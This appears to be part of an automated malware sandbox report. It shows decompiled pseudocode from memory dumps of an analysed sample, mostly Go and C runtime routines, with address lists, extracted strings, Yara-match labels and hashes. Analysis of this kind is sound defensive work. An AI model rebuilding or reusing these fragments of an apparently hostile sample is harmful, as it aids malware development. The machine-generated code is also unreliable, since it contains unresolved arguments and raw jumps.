						if((_t155 & 0x00000003) != 0) {
							L32:
							_t137 = 0x138b2ab;
							_t111 = 0x1a;
							E01330BA0(0x138b2ab, _t150, _t168);
							goto L33;
						}
						if(_t111 != 0) {
							E01330BA0(0x138aad8, _t150, _t168);
							goto L32;
						}
						_v120 =  *((intOrPtr*)(_t163 + 0x68));
						while(_t155 > 0) {
							_v136 = _t155;
							_v96 = _t137;
							_t164 = _t155;
							_t89 = E0130F840(_t111, _t121, _t137, _t162, _t164, _t168, _t191);
							_v104 = _t137;
							_v140 = _t111;
							_v144 = _t121;
							_v112 = _t162;
							_v128 = _t164;
							_t158 = _t164;
							_t165 = _t164 >> 2;
							if(_v120 != 8) {
								_t89 = L01358F20(_t89, _t111, _t121, _t122, _t123, _t125, _v96, _t165, _t158);
								goto L22;
							} else {
								_t182 = _v96;
								r10d = 0;
								while(_t187 < _t165) {
									 *_t182 = 0xff;
									_t187 = _t187 + 1;
									_t182 = _t182 + 1;
								}
								L22:
								_t155 = _v136 - _v128;
								_t137 = _v104;
								_t121 = _v144;
								_t111 = _v140;
								_t162 = _v112;
								continue;
							}
							break;
						}
						return _t89;
						goto L34;
					}
				} else {
					_a8 = __rax;
					if( *((intOrPtr*)(__rax)) != __rdi) {
						L16:
						_a32 = _t162;
						E013513C0(_t121, _t123, _t125, _t126, _t136, _t150, _t162, _t168, _t177, _t191);
						_v24 = _t136;
						_v40 = _t150;
						_v48 =  *_a8;
						E01332340(_t155, _t168, _t191);
						E01332C40(_t121, _t123, _t125, _t126, 0x138d8aa, _t150, _t168, _t191);
						_t150 = _v40;
						E01332C40(_t121, _t123, _t125, _t126, _v24, _v40, _t168, _t191);
						E01332C40(_t121, _t123, _t125, _t126, 0x1387696, _v40, _t168, _t191);
						E01332940(_t123, _t125, _t126, _v48,  *_a8, _t168, _t191);
						E01332C40(_t121, _t123, _t125, _t126, 0x1388d40, _v40, _t168, _t191);
						E01332940(_t123, _t125, _t126, _a32,  *_a8, _t168, _t191);
						E013325A0(_t121, _t122, _t123, _t125, _t126, _t168, _t191);
						L013323C0(_t155, _t168, _t191);
						E01330BA0(0x138d0f3, _v40, _t168);
						goto L17;
					} else {
						_t122 =  *(__rax + 0x17) & 0x000000ff;
						if(( *(__rax + 0x17) & 0x40) != 0) {
							E013513C0(__ecx, _t123, __esi, _t126, __rax, __rbx, __rdi, _t168, _t177, __r14);
							_v24 = __rax;
							_v40 = __rbx;
							E01332340(_t155, _t168, __r14);
							E01332C40(__ecx, _t123, __esi, _t126, 0x138d8aa, __rbx, _t168, __r14);
							_t150 = _v40;
							E01332C40(__ecx, _t123, __esi, _t126, _v24, _t150, _t168, __r14);
							E01332C40(__ecx, _t123, __esi, _t126, 0x13883ae, _t150, _t168, __r14);
							L013323C0(_t155, _t168, __r14);
							_t136 = 0x138d0f3;
							E01330BA0(0x138d0f3, _t150, _t168);
							goto L16;
						} else {
							if( *0x14cf564 == 0) {
								return __eax;
							} else {
								_a16 = __rbx;
								_a24 = __rcx;
								_t161 =  *((intOrPtr*)( *((intOrPtr*)(__r14 + 0x30)) + 0xa0));
								_v16 = _t161;
								_t166 =  *((intOrPtr*)(__rax + 0x20));
								r8d = 0;
								while( *((intOrPtr*)(_t136 + 8)) > _t162) {
									_t133 = _t162 & 0x0000003f;
									if(_t133 != 0) {
										r8d = r8d >> 1;
									} else {
										r8d =  *_t166 & 0x000000ff;
										_t166 =  &(_t166[1]);
									}
									asm("inc ecx");
									if(_t133 < 0) {
										_t190 =  *((intOrPtr*)(_t161 + 0x1260));
										 *_t190 =  *((intOrPtr*)(_t162 + _t150));
										 *((long long*)(_t190 + 8)) =  *((intOrPtr*)(_t162 + _t152));
										_t186 =  *((intOrPtr*)(_t161 + 0x1260)) + 0x10;
										 *((long long*)(_t161 + 0x1260)) = _t186;
										if( *((intOrPtr*)(_t161 + 0x1268)) == _t186) {
											_v56 = _t162;
											_v60 = r8d;
											_v32 = _t166;
											_t88 = E0132A340(_t136, _t168, _t191);
											_t136 = _a8;
											_t152 = _a24;
											_t161 = _v16;
											_t150 = _a16;
											_t166 = _v32;
											_t162 = _v56;
											r8d = _v60;
										}
									}
									_t162 = _t162 + 8;
								}
								return _t88;
							}
						}
					}
				}
				L34:
			}















































                                                                                                                            0x01310100
                                                                                                                            0x01310100
                                                                                                                            0x01310100
                                                                                                                            0x01310100
                                                                                                                            0x01310100
                                                                                                                            0x01310100
                                                                                                                            0x01310100
                                                                                                                            0x01310100
                                                                                                                            0x01310100
                                                                                                                            0x01310104
                                                                                                                            0x01310109
                                                                                                                            0x01310111
                                                                                                                            0x01310325
                                                                                                                            0x01310325
                                                                                                                            0x0131032c
                                                                                                                            0x01310331
                                                                                                                            0x01310337
                                                                                                                            0x01310338
                                                                                                                            0x01310339
                                                                                                                            0x0131033a
                                                                                                                            0x0131033b
                                                                                                                            0x0131033c
                                                                                                                            0x0131033d
                                                                                                                            0x0131033e
                                                                                                                            0x0131033f
                                                                                                                            0x00000000
                                                                                                                            0x01310340
                                                                                                                            0x01310344
                                                                                                                            0x01310457
                                                                                                                            0x01310457
                                                                                                                            0x0131045c
                                                                                                                            0x01310460
                                                                                                                            0x01310464
                                                                                                                            0x01310469
                                                                                                                            0x0131046e
                                                                                                                            0x01310473
                                                                                                                            0x01310478
                                                                                                                            0x0131047c
                                                                                                                            0x01310480
                                                                                                                            0x01310485
                                                                                                                            0x00000000
                                                                                                                            0x01310485
                                                                                                                            0x0131034a
                                                                                                                            0x0131034e
                                                                                                                            0x01310353
                                                                                                                            0x01310358
                                                                                                                            0x0131035d
                                                                                                                            0x0131036a
                                                                                                                            0x01310375
                                                                                                                            0x01310445
                                                                                                                            0x01310445
                                                                                                                            0x0131044c
                                                                                                                            0x01310451
                                                                                                                            0x00000000
                                                                                                                            0x01310451
                                                                                                                            0x01310382
                                                                                                                            0x01310440
                                                                                                                            0x00000000
                                                                                                                            0x01310440
                                                                                                                            0x0131038c
                                                                                                                            0x013103b7
                                                                                                                            0x013103bc
                                                                                                                            0x013103c1
                                                                                                                            0x013103c6
                                                                                                                            0x013103c9
                                                                                                                            0x013103ce
                                                                                                                            0x013103d3
                                                                                                                            0x013103d7
                                                                                                                            0x013103db
                                                                                                                            0x013103e0
                                                                                                                            0x013103e5
                                                                                                                            0x013103e8
                                                                                                                            0x013103f5
                                                                                                                            0x0131040a
                                                                                                                            0x00000000
                                                                                                                            0x013103f7
                                                                                                                            0x013103f7
                                                                                                                            0x013103fc
                                                                                                                            0x01310426
                                                                                                                            0x0131041b
                                                                                                                            0x0131041f
                                                                                                                            0x01310423
                                                                                                                            0x01310423
                                                                                                                            0x01310393
                                                                                                                            0x0131039d
                                                                                                                            0x013103a5
                                                                                                                            0x013103aa
                                                                                                                            0x013103ae
                                                                                                                            0x013103b2
                                                                                                                            0x00000000
                                                                                                                            0x013103b2
                                                                                                                            0x00000000
                                                                                                                            0x013103f5
                                                                                                                            0x0131041a
                                                                                                                            0x00000000
                                                                                                                            0x0131041a
                                                                                                                            0x01310117
                                                                                                                            0x01310117
                                                                                                                            0x01310123
                                                                                                                            0x0131027b
                                                                                                                            0x0131027b
                                                                                                                            0x01310280
                                                                                                                            0x01310285
                                                                                                                            0x0131028a
                                                                                                                            0x01310297
                                                                                                                            0x013102a0
                                                                                                                            0x013102b1
                                                                                                                            0x013102bb
                                                                                                                            0x013102c0
                                                                                                                            0x013102d1
                                                                                                                            0x013102e0
                                                                                                                            0x013102f1
                                                                                                                            0x01310300
                                                                                                                            0x01310305
                                                                                                                            0x0131030a
                                                                                                                            0x01310320
                                                                                                                            0x00000000
                                                                                                                            0x01310129
                                                                                                                            0x01310129
                                                                                                                            0x01310130
                                                                                                                            0x01310220
                                                                                                                            0x01310225
                                                                                                                            0x0131022a
                                                                                                                            0x0131022f
                                                                                                                            0x01310240
                                                                                                                            0x0131024a
                                                                                                                            0x0131024f
                                                                                                                            0x01310260
                                                                                                                            0x01310265
                                                                                                                            0x0131026a
                                                                                                                            0x01310276
                                                                                                                            0x00000000
                                                                                                                            0x01310136
                                                                                                                            0x0131013d
                                                                                                                            0x0131016f
                                                                                                                            0x0131013f
                                                                                                                            0x0131013f
                                                                                                                            0x01310144
                                                                                                                            0x0131014d
                                                                                                                            0x01310154
                                                                                                                            0x0131015b
                                                                                                                            0x01310161
                                                                                                                            0x01310174
                                                                                                                            0x01310180
                                                                                                                            0x01310187
                                                                                                                            0x01310192
                                                                                                                            0x01310189
                                                                                                                            0x01310189
                                                                                                                            0x0131018d
                                                                                                                            0x0131018d
                                                                                                                            0x01310195
                                                                                                                            0x0131019a
                                                                                                                            0x013101a4
                                                                                                                            0x013101b1
                                                                                                                            0x013101b4
                                                                                                                            0x013101bf
                                                                                                                            0x013101c3
                                                                                                                            0x013101d1
                                                                                                                            0x013101d3
                                                                                                                            0x013101d8
                                                                                                                            0x013101dd
                                                                                                                            0x013101e6
                                                                                                                            0x013101eb
                                                                                                                            0x013101f0
                                                                                                                            0x013101f5
                                                                                                                            0x013101fa
                                                                                                                            0x013101ff
                                                                                                                            0x01310204
                                                                                                                            0x01310209
                                                                                                                            0x01310209
                                                                                                                            0x013101d1
                                                                                                                            0x01310170
                                                                                                                            0x01310170
                                                                                                                            0x0131021c
                                                                                                                            0x0131021c
                                                                                                                            0x0131013d
                                                                                                                            0x01310130
                                                                                                                            0x01310123
                                                                                                                            0x00000000

                                                                                                                            Strings
                                                                                                                            • runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime: unblock on closing polldescruntime: wrong goroutine in newstackuncaching span but s.allocCount == 0) is sma, xrefs: 0131026A, 0131030F
                                                                                                                            • runtime: typeBitsBulkBarrier with type attempted to add zero-sized address rangebinary: varint overflows a 64-bit integergcSweep being done but phase is not GCoffmheap.freeSpanLocked - invalid span statemheap.freeSpanLocked - invalid stack freeobjects added o, xrefs: 01310234, 013102A5
                                                                                                                            • runtime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt baseunexpected call to os.Exit(0) during testacquireSudog: found s.elem != nil in cachenon-empty mark queue after concurrent markon a locked , xrefs: 01310325
                                                                                                                            • but memory size because dotdotdot in async preempt to non-Go memory , locked to threadArab Standard TimeCaucasian_AlbanianCommandLineToArgvWCreateFileMappingWCuba Standard TimeFiji Standard TimeGetComputerNameExWGetExitCodeProcessGetFileAttributesWGetModul, xrefs: 013102E5
                                                                                                                            • of size (targetpc= , plugin: KiB work, exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=, elemsize=, npages = /dev/stderr/dev/stdout: frame.sp=CloseHandleCreateF, xrefs: 013102C5
                                                                                                                            • with GC prog<invalid Value>ASCII_Hex_DigitCreateHardLinkWDeviceIoControlDuplicateHandleFailed to find Failed to load FlushViewOfFileGetAdaptersInfoGetCommandLineWGetProcessTimesGetStartupInfoWHanifi_RohingyaImpersonateSelfOpenThreadTokenOther_LowercaseOther, xrefs: 01310254
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: but memory size because dotdotdot in async preempt to non-Go memory , locked to threadArab Standard TimeCaucasian_AlbanianCommandLineToArgvWCreateFileMappingWCuba Standard TimeFiji Standard TimeGetComputerNameExWGetExitCodeProcessGetFileAttributesWGetModul$ of size (targetpc= , plugin: KiB work, exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=, elemsize=, npages = /dev/stderr/dev/stdout: frame.sp=CloseHandleCreateF$ with GC prog<invalid Value>ASCII_Hex_DigitCreateHardLinkWDeviceIoControlDuplicateHandleFailed to find Failed to load FlushViewOfFileGetAdaptersInfoGetCommandLineWGetProcessTimesGetStartupInfoWHanifi_RohingyaImpersonateSelfOpenThreadTokenOther_LowercaseOther$runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime: unblock on closing polldescruntime: wrong goroutine in newstackuncaching span but s.allocCount == 0) is sma$runtime: typeBitsBulkBarrier with type attempted to add zero-sized address rangebinary: varint overflows a 64-bit integergcSweep being done but phase is not GCoffmheap.freeSpanLocked - invalid span statemheap.freeSpanLocked - invalid stack freeobjects added o$runtime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt baseunexpected call to os.Exit(0) during testacquireSudog: found s.elem != nil in cachenon-empty mark queue after concurrent markon a locked
                                                                                                                            • API String ID: 0-2335534072
                                                                                                                            • Opcode ID: 8d9064964c2f3ca3e1589eb4a4b66c5081d3978dcfc1166389ca0f4eddcd67b5
                                                                                                                            • Instruction ID: dabe5dd1226303fb4e16f6118e0940ddaf8661c0811fd61e4c7bf7402fd72260
                                                                                                                            • Opcode Fuzzy Hash: 8d9064964c2f3ca3e1589eb4a4b66c5081d3978dcfc1166389ca0f4eddcd67b5
                                                                                                                            • Instruction Fuzzy Hash: 77518C36218B84C6DB19EF59E48039EBB64F799B88F944121EF8D07B69CF38C591CB04
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A6F370 Relevance: 7.6, APIs: 5, Instructions: 126COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 64%
                                                                                                                            			E0000025B25BF8A6F370(intOrPtr __edx, void* __esi, intOrPtr* __rax, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long* __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
				void* _v40;
				char _v64;
				char _v88;
				void* __rdi;
				void* __r13;
				void* _t26;
				intOrPtr _t49;
				void* _t67;
				void* _t69;
				void* _t74;
				intOrPtr* _t75;
				long long _t91;
				void* _t109;
				long long _t110;
				void* _t122;
				void* _t123;
				long long* _t126;
				intOrPtr* _t127;

				_t122 = __r9;
				_t120 = __r8;
				_t76 = __rbx;
				_t75 = __rax;
				_t68 = __esi;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t109 = __rcx;
				_t126 = __r8;
				_t49 = __edx;
				E0000025B25BF8A73124(0x1000, __esi, __rax, __rbx, __rsi, __rbp);
				r14d = 0x800;
				E0000025B25BF8A73278(r14d, _t75);
				_t112 = _t75;
				_t26 = E0000025B25BF8A73278(r14d, _t75);
				r8d = _t49;
				E0000025B25BF8A73230(_t26,  &_v64, _t109);
				r8d = r14d;
				E0000025B25BF8A733B8(_t76,  &_v64, _t75);
				E0000025B25BF8A7A52C(_t76, _t75, 0xf8a8bb10, _t75, _t75, _t120, _t122);
				_t110 = _t75;
				_t6 = _t75 - 1; // -1
				if (_t6 - 0xfffffffd > 0) goto 0xf8a6f528;
				r8d = 0x25bf8a8bb12;
				fseek(??, ??, ??);
				E0000025B25BF8A7AE18(_t75, _t76, _t110);
				r8d = 0;
				_t127 = _t75;
				fseek(??, ??, ??);
				_t8 = _t127 - 1; // -1
				if (_t8 - _t75 > 0) goto 0xf8a6f509;
				r9d = 0;
				r14d = E0000025B25BF8A8B4F0(0xfffffffe, _t49, r14d, _t67, _t69, _t74, _t75, _t76, _t112, 0xf8a8bb10, _t110, _t112, _t123, _t126);
				_t9 = _t75 - 1; // -1
				if (_t9 - 0x7ff > 0) goto 0xf8a6f502;
				malloc(??);
				_t91 =  *0xf8a9d8a8; // 0xd9f400038dc4
				r8d =  *0xf8a9d8b0; // 0xda43
				 *((long long*)(_t75 + 0x10)) = _t91;
				 *_t75 = r8d;
				r8d = r8d + 1;
				_t77 = _t75;
				 *((long long*)(_t75 + 8)) = _t110;
				 *((intOrPtr*)(_t75 + 4)) = r15d;
				 *0xf8a9d8a8 = _t75;
				 *0xf8a9d8b0 = r8d;
				E0000025B25BF8A6C364(E0000025B25BF8A6C364(E0000025B25BF8A6C334(_t49, 0x1000, _t75, _t75,  &_v88, _t110),  *_t75,  &_v88), r15d,  &_v88);
				r8d = r14d;
				E0000025B25BF8A6C2A8(_t68, _t75,  &_v88, _t112);
				E0000025B25BF8A6C400(E0000025B25BF8A73274( &_v88),  &_v88);
				r8d = 2;
				 *_t126();
				E0000025B25BF8A6C310(_t40, _t75,  &_v88, _t110);
				goto 0xf8a6f535;
				goto 0xf8a6f50e;
				E0000025B25BF8A6D03C(_t75,  &_v88, _t112, _t112, _t75);
				E0000025B25BF8A7320C(_t75, _t112);
				fclose(??);
				goto 0xf8a6f53d;
				E0000025B25BF8A6D03C(_t77, _t110, _t112, _t112, _t75);
				return E0000025B25BF8A7320C(_t75, _t112);
			}





















                                                                                                                            0x25bf8a6f370
                                                                                                                            0x25bf8a6f370
                                                                                                                            0x25bf8a6f370
                                                                                                                            0x25bf8a6f370
                                                                                                                            0x25bf8a6f370
                                                                                                                            0x25bf8a6f370
                                                                                                                            0x25bf8a6f375
                                                                                                                            0x25bf8a6f37a
                                                                                                                            0x25bf8a6f38c
                                                                                                                            0x25bf8a6f394
                                                                                                                            0x25bf8a6f397
                                                                                                                            0x25bf8a6f399
                                                                                                                            0x25bf8a6f39e
                                                                                                                            0x25bf8a6f3ad
                                                                                                                            0x25bf8a6f3b8
                                                                                                                            0x25bf8a6f3bb
                                                                                                                            0x25bf8a6f3c5
                                                                                                                            0x25bf8a6f3ce
                                                                                                                            0x25bf8a6f3d8
                                                                                                                            0x25bf8a6f3de
                                                                                                                            0x25bf8a6f3ed
                                                                                                                            0x25bf8a6f3f2
                                                                                                                            0x25bf8a6f3f5
                                                                                                                            0x25bf8a6f3fd
                                                                                                                            0x25bf8a6f408
                                                                                                                            0x25bf8a6f40c
                                                                                                                            0x25bf8a6f414
                                                                                                                            0x25bf8a6f419
                                                                                                                            0x25bf8a6f421
                                                                                                                            0x25bf8a6f424
                                                                                                                            0x25bf8a6f429
                                                                                                                            0x25bf8a6f435
                                                                                                                            0x25bf8a6f43b
                                                                                                                            0x25bf8a6f44d
                                                                                                                            0x25bf8a6f450
                                                                                                                            0x25bf8a6f459
                                                                                                                            0x25bf8a6f464
                                                                                                                            0x25bf8a6f469
                                                                                                                            0x25bf8a6f470
                                                                                                                            0x25bf8a6f477
                                                                                                                            0x25bf8a6f47b
                                                                                                                            0x25bf8a6f47e
                                                                                                                            0x25bf8a6f48b
                                                                                                                            0x25bf8a6f48e
                                                                                                                            0x25bf8a6f492
                                                                                                                            0x25bf8a6f496
                                                                                                                            0x25bf8a6f49d
                                                                                                                            0x25bf8a6f4bd
                                                                                                                            0x25bf8a6f4c7
                                                                                                                            0x25bf8a6f4cd
                                                                                                                            0x25bf8a6f4e3
                                                                                                                            0x25bf8a6f4e8
                                                                                                                            0x25bf8a6f4f3
                                                                                                                            0x25bf8a6f4fb
                                                                                                                            0x25bf8a6f500
                                                                                                                            0x25bf8a6f507
                                                                                                                            0x25bf8a6f511
                                                                                                                            0x25bf8a6f519
                                                                                                                            0x25bf8a6f521
                                                                                                                            0x25bf8a6f526
                                                                                                                            0x25bf8a6f530
                                                                                                                            0x25bf8a6f55a

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$_invalid_parameter_noinfomalloc$fseek$_callnewh_fseek_nolock_ftelli64fclose
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1756087678-0
                                                                                                                            • Opcode ID: 255f0e2d2d8364b95d48539cf85664292cfab175bb059365731960e5348beca0
                                                                                                                            • Instruction ID: 5e368b156c31a140d234eae114193f14b32b022a1f86746fcc7d8193663e60a3
                                                                                                                            • Opcode Fuzzy Hash: 255f0e2d2d8364b95d48539cf85664292cfab175bb059365731960e5348beca0
                                                                                                                            • Instruction Fuzzy Hash: EF41A123304E9052EF11EB22AC193AD6251F788BE1FA19125BE5A47FDADF3CC5028758
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A7A538 Relevance: 7.6, APIs: 5, Instructions: 124COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0000025B25BF8A7A538(long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, long long __r8, void* __r9, void* _a8, void* _a16, void* _a32) {
				void* _t8;
				intOrPtr* _t15;
				intOrPtr* _t27;

				_t15 = _t27;
				 *((long long*)(_t15 + 8)) = __rbx;
				 *((long long*)(_t15 + 0x10)) = __rbp;
				 *((long long*)(_t15 + 0x20)) = __rsi;
				 *((long long*)(_t15 + 0x18)) = __r8;
				if (__rdx == 0) goto 0xf8a7a580;
				if (__r8 == 0) goto 0xf8a7a580;
				if (__r9 != 0) goto 0xf8a7a59f;
				_t8 = E0000025B25BF8A7B89C(_t15);
				 *_t15 = 0x16;
				E0000025B25BF8A7BEC4(_t8);
				return 0;
			}






                                                                                                                            0x25bf8a7a538
                                                                                                                            0x25bf8a7a53b
                                                                                                                            0x25bf8a7a53f
                                                                                                                            0x25bf8a7a543
                                                                                                                            0x25bf8a7a547
                                                                                                                            0x25bf8a7a564
                                                                                                                            0x25bf8a7a569
                                                                                                                            0x25bf8a7a56e
                                                                                                                            0x25bf8a7a570
                                                                                                                            0x25bf8a7a575
                                                                                                                            0x25bf8a7a57b
                                                                                                                            0x25bf8a7a59e

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1640621425-0
                                                                                                                            • Opcode ID: 94ede83721b29951deade4c3a87e27cd6241ef0a99defbf4f0aa5ada93c88977
                                                                                                                            • Instruction ID: 9e6f39d10976e9a3517709166c2b171c2853c353cb5f8730ca0a83ec577c35b6
                                                                                                                            • Opcode Fuzzy Hash: 94ede83721b29951deade4c3a87e27cd6241ef0a99defbf4f0aa5ada93c88977
                                                                                                                            • Instruction Fuzzy Hash: D5410823300F8056FE669A225D4A35EA692F754FF1F384120BE6647FD1FB78E441A218
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0130AAC0 Relevance: 7.6, Strings: 6, Instructions: 117COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 80%
                                                                                                                            			E0130AAC0(void* __eax, signed int __ebx, signed int __rax, signed int __rdx, void* __rdi, long long __rbp, void* __r14, signed int _a8, signed int _a16) {
				char _v8;
				signed int _v16;
				long long _v24;
				signed int _v32;
				long long _v40;
				signed short _v42;
				void* _t51;
				void* _t72;
				signed int _t82;
				signed int _t85;
				signed int _t87;
				signed short _t88;
				void* _t90;
				signed int _t100;
				long long _t102;
				long long _t115;
				long long _t117;
				long long _t118;
				signed int _t120;
				void* _t122;
				void* _t123;
				void* _t127;
				void* _t130;
				signed int _t131;
				void* _t132;

				L0:
				while(1) {
					L0:
					_t133 = __r14;
					_t125 = __rbp;
					_t122 = __rdi;
					_t120 = __rdx;
					_t100 = __rax;
					_t73 = __ebx;
					if(_t127 <=  *((intOrPtr*)(__r14 + 0x10))) {
						goto L13;
					}
					L1:
					_v8 = __rbp;
					_t125 =  &_v8;
					_t85 = __ebx & 0x000000ff;
					if(__rdx >= 0x88) {
						L12:
						_t100 = _t120;
						E013588C0();
						goto L13;
					}
					L2:
					_v16 = __rdx;
					_a16 = __ebx;
					_a8 = __rax;
					_t117 =  *((intOrPtr*)(__rax + 0x28 + __rdx * 8));
					_v24 = _t117;
					_t102 = _t117;
					_t51 = E0130F1C0(__eax, _t82, _t85, _t102,  &_v8, _t130, _t132, __r14);
					_t118 = _v24;
					_t120 =  *((intOrPtr*)(_t118 + 0x38));
					if(_t102 != _t120) {
						L5:
						_t115 = _t102;
					} else {
						L3:
						_v32 = _t120;
						_t82 =  *(_t118 + 0x60) & 0x0000ffff;
						if(_t120 != _t118) {
							L11:
							_v42 = _t82;
							E01332340(_t120, _t125, _t133);
							E01332C40(_t82, _t87, _t88, _t90, 0x138a811, _t115, _t125, _t133);
							E01332940(_t87, _t88, _t90, 0x138a811, _t118, _t125, _t133);
							E01332C40(_t82, _t87, _t88, _t90, 0x1387725, _t115, _t125, _t133);
							E01332940(_t87, _t88, _t90, _v32, _t118, _t125, _t133);
							E013325A0(_t82, _t85, _t87, _t88, _t90, _t125, _t133);
							L013323C0(_t120, _t125, _t133);
							_t73 = 0x31;
							E01330BA0(0x138e747, _t115, _t125);
							goto L12;
						} else {
							L4:
							_v40 = _t102;
							_t72 = E01311F80(_t51, _a16 & 0x000000ff, _t90, _a8, _t120, _t123,  &_v8, __r14);
							_t102 =  *((intOrPtr*)(_a8 + 0x28 + _v16 * 8));
							_v24 = _t102;
							_t51 = E0130F1C0(_t72, _t82, _t85, _t102,  &_v8, _t130, _t132, __r14);
							_t120 = _v32;
							_t115 = _v40;
							_t118 = _v24;
						}
					}
					L6:
					if( *((intOrPtr*)(_t118 + 0x38)) <= _t102) {
						L10:
						E01330BA0(0x138a156, _t115, _t125);
						goto L11;
					}
					L7:
					_t88 = ( *(_t118 + 0x60) & 0x0000ffff) + 1;
					 *(_t118 + 0x60) = _t88;
					_t87 = _t88 & 0x0000ffff;
					_t131 =  *((intOrPtr*)(_t118 + 0x38));
					if(_t131 < _t122) {
						L9:
						_v42 = _t88;
						_v32 = _t131;
						E01332340(_t120, _t125, _t133);
						E01332C40(_t82, _t87, _t88, _t90, 0x13882f8, _t115, _t125, _t133);
						E01332940(_t87, _t88, _t90, 0x13882f8, _t118, _t125, _t133);
						E01332C40(_t82, _t87, _t88, _t90, 0x1387725, _t115, _t125, _t133);
						E01332940(_t87, _t88, _t90, _v32, _t118, _t125, _t133);
						E013325A0(_t82, _t85, _t87, _t88, _t90, _t125, _t133);
						L013323C0(_t120, _t125, _t133);
						E01330BA0(0x138a828, _t115, _t125);
						goto L10;
					}
					L8:
					return _t51;
					L14:
					L13:
					_a8 = _t100;
					_a16 = _t73;
					E01356200(_t120, _t125);
				}
			}




























                                                                                                                            0x0130aac0
                                                                                                                            0x0130aac0
                                                                                                                            0x0130aac0
                                                                                                                            0x0130aac0
                                                                                                                            0x0130aac0
                                                                                                                            0x0130aac0
                                                                                                                            0x0130aac0
                                                                                                                            0x0130aac0
                                                                                                                            0x0130aac0
                                                                                                                            0x0130aac4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0130aaca
                                                                                                                            0x0130aace
                                                                                                                            0x0130aad3
                                                                                                                            0x0130aada
                                                                                                                            0x0130aae7
                                                                                                                            0x0130aca5
                                                                                                                            0x0130aca5
                                                                                                                            0x0130acad
                                                                                                                            0x00000000
                                                                                                                            0x0130acad
                                                                                                                            0x0130aaed
                                                                                                                            0x0130aaed
                                                                                                                            0x0130aaf2
                                                                                                                            0x0130aaf6
                                                                                                                            0x0130aafb
                                                                                                                            0x0130ab00
                                                                                                                            0x0130ab05
                                                                                                                            0x0130ab08
                                                                                                                            0x0130ab0d
                                                                                                                            0x0130ab12
                                                                                                                            0x0130ab19
